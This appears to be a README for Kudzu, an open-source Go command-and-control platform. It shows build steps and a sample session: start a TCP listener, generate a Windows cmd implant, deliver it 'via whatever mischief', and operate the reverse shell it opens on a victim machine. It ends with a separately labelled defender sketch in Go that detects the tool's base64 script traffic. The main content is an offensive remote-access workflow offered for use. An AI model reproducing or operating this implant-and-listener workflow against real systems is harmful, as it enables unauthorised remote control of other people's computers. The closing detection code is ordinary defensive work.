Kudzu

An extensible Go C2 platform

Overview

Kudzu is a Go-based C2 platform with an emphasis on extensibility. My goal was to provide a platform, written in a modern language, to which new scripts and exploits could be easily added and modified. It is a lofty goal, especially for a lone coder of dubious skill, but with enough time, determination, and caffeine, great things are possible!

Quick Start

Installation

Windows:

>> go get -u github.com/TerminalJockey/Kudzu
>> cd %GOPATH%\src\github.com\TerminalJockey\Kudzu
>> go build -o KudzuConsole.exe main.go
>> KudzuConsole.exe

Linux:

>> go get -u github.com/TerminalJockey/Kudzu
>> cd ~/go/src/github.com/TerminalJockey/Kudzu
>> go build -o KudzuConsole main.go
>> sudo ./KudzuConsole

Usage

The usual workflow is as follows:

  • Start listener

<kudzu> nodes
<kudzu nodes> setop nodetype tcp
<kudzu nodes> setop addr 127.0.0.1
<kudzu nodes> setop port 31337
<kudzu nodes> run
<kudzu nodes> ls
Nodes:
Listeners:
6e770a3487 127.0.0.1:7896
<kudzu nodes>

  • Generate implant

<kudzu> implants
<kudzu implants> setop filename bad.exe
<kudzu implants> setop listener 6e770a3487
<kudzu implants> setop implanttype cmd
<kudzu implants> run
{cmd  {6e770a3487 0xc0000049e0}}
proceed? Y/N > y
generated implant! check ../tmp/
<kudzu implants>

  • Deliver your implant via whatever mischief you see fit (???)

  • Profit!

<kudzu implants> Got Connection ID: 34ffa7713f 127.0.0.1:7896
<kudzu implants> nodes
<kudzu nodes> interact 34ffa7713f                                                   
interacting...
34ffa7713f
found node for interaction
Microsoft Windows [Version REDACTED]
(c) 31337 Microsoft Corporation. All rights reserved.

C:\Users\TESTER\>whoami
desktop\TESTER
C:\Users\TESTER\>

Notes

  • Each menu has a help option, and you can swap to your desired menu simply by typing the relevant keyword as shown above.

  • Using the runscript command while in an implant cmdshell causes the base64 script contents to be written to the cmdshell's stdin. While it doesn't look like anything is executed or submitted, it is unintended and may (read: will likely) generate some weird-looking traffic.
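
For defenders, the runscript behaviour in the note above is a network signal: a long base64 blob appearing in the middle of an otherwise line-oriented shell session. The Go sketch below is an added example, not part of Kudzu. It assumes the session bytes are visible in cleartext and that the standard base64 alphabet is used, and both the 40-character threshold and the sample payloads are constructed for illustration.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
)

// base64Run matches a contiguous run of standard base64 alphabet
// characters followed by optional '=' padding.
var base64Run = regexp.MustCompile(`[A-Za-z0-9+/]+={0,2}`)

// FindBase64Runs returns every run in payload that is at least minLen
// characters long and decodes as valid standard base64. Short tokens
// (commands, user names, path components) fall under the length cut-off.
func FindBase64Runs(payload []byte, minLen int) []string {
	var hits []string
	for _, m := range base64Run.FindAll(payload, -1) {
		if len(m) < minLen {
			continue
		}
		// Reject runs that only look like base64 (bad length or padding).
		if _, err := base64.StdEncoding.DecodeString(string(m)); err != nil {
			continue
		}
		hits = append(hits, string(m))
	}
	return hits
}

func main() {
	// Constructed sample payloads, not traffic captured from Kudzu.
	script := base64.StdEncoding.EncodeToString(
		[]byte("Write-Output 'constructed sample script body for the example'"))
	streams := []struct {
		name string
		data []byte
	}{
		{"interactive", []byte("C:\\Users\\TESTER\\>whoami\r\ndesktop\\TESTER\r\n")},
		{"runscript", []byte("C:\\Users\\TESTER\\>" + script + "\r\n")},
	}
	for _, s := range streams {
		n := len(FindBase64Runs(s.data, 40))
		fmt.Printf("%s: %d base64 run(s) of 40+ chars\n", s.name, n)
	}
}
```

Tune the threshold against your own baseline traffic before alerting on it, since long alphanumeric tokens can also decode as base64.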

Last updated 4 years ago